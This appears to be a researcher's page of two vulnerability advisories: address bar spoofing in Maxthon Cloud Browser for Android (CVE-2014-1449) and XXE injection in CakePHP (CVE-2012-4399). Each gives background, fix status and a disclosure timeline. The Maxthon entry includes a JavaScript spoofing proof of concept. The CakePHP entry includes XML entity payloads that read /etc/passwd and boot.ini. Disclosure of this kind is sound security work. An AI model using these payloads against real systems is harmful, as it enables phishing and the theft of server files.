Maxthon Cloud Browser for Android Address Bar Spoofing

10.01.2014

CVE-2014-1449

Spoofing

# Vulnerability: Maxthon Cloud Browser for Android Address Bar Spoofing
# Date: 10.01.2014
# Software Link: https://play.google.com/store/apps/details?id=com.mx.browser
# Vulnerable version: 4.1.4.2000
# Tested on: Android 4.4
# CVE: CVE-2014-1449
# Author: Pawel Wylecial
# http://h0wl.pl

1. Background


Description from the vendor website: "Maxthon Cloud Browser for Android is the first multi-tab browser with Maxthon’s innovative Cloud Services, including: Cloud Tabs, Cloud Push, Cloud Download and bookmarks/favorites syncing. With its cool design and out of the box features like Super Gestures, Reader Mode, App Center and more, this browser delivers a fresh and original browsing experience."

2. Vulnerability


Maxthon for Android is vulnerable to Address Bar Spoofing. Using the history API it was possible to spoof the URL in the address bar which could trick the user that he is visiting a different site than he thinks.

3. Proof of Concept



                        <html>
                        <script>
                        function trigger() {
                                w = window.open("http://howl.overflow.pl");
                                w.location = "http://h0wl.pl";
                                setTimeout('w.location = "a.html"', 1000);
                                setTimeout('w.history.back();', 2000);
                                setTimeout('w.history.forward();', 2100);
                        }
                        </script>
                        <a href="javascript:trigger();">click</a>
                        </html>
                      

PoC in action: http://howl.overflow.pl/maxthon1.mp4

4. Fix


No response from the vendor, silent fix applied in 4.1.5.2000 (can't confirm here, updated straight to 4.1.6.2000) or 4.1.6.2000

5. Timeline


10.01.2014 - vulnerability reported
15.01.2014 - second e-mail
21.01.2014 - third
22.01.2014 - *silent fix applied (?), http://www.maxthon.com/android/changelog/
29.01.2014 - last try
10.03.2014 - advisory published

CakePHP XXE Injection

01.07.2012

CVE-2012-4399

Information Disclosure / RCE

# Exploit title: CakePHP XXE injection
# Date: 01.07.2012
# Software Link: http://www.cakephp.org
# Vulnerable version: 2.x - 2.2.0-RC2
# Tested on: Windows and Linux
# CVE: CVE-2012-4399
# Author: Pawel Wylecial
# http://h0wl.pl

1. Background



Short description from the project website: "CakePHP makes building web applications simpler, faster and require less code."

2. Vulnerability



CakePHP is vulnerable to XML eXternal Entity injection. The class responsible for building XML (it uses PHP SimpleXML) does allow local file inclusion.

3. Proof of Concept



Linux:


<!DOCTYPE cakephp [
  <!ENTITY payload SYSTEM "file:///etc/passwd" >]>
<request>
  <xxe>&payload;</xxe>
</request>

Windows:



<!DOCTYPE cakephp [
  <!ENTITY payload SYSTEM "file:///C:/boot.ini" >]>
<request>
  <xxe>&payload;</xxe>
</request>

4. Fix



Fix applied in version 2.2.1 and 2.1.5. See official security release:
http://bakery.cakephp.org/articles/markstory/2012/07/14/security_release_-_cakephp_2_1_5_2_2_1

5. Timeline



1.07.2012 - vulnerability reported
13.07.2012 - response from CakePHP
14.07.2012 - confirmed and fix release

Contact

BlackOwlSec Pawel Wylecial
Poland
VAT-ID PL7822493185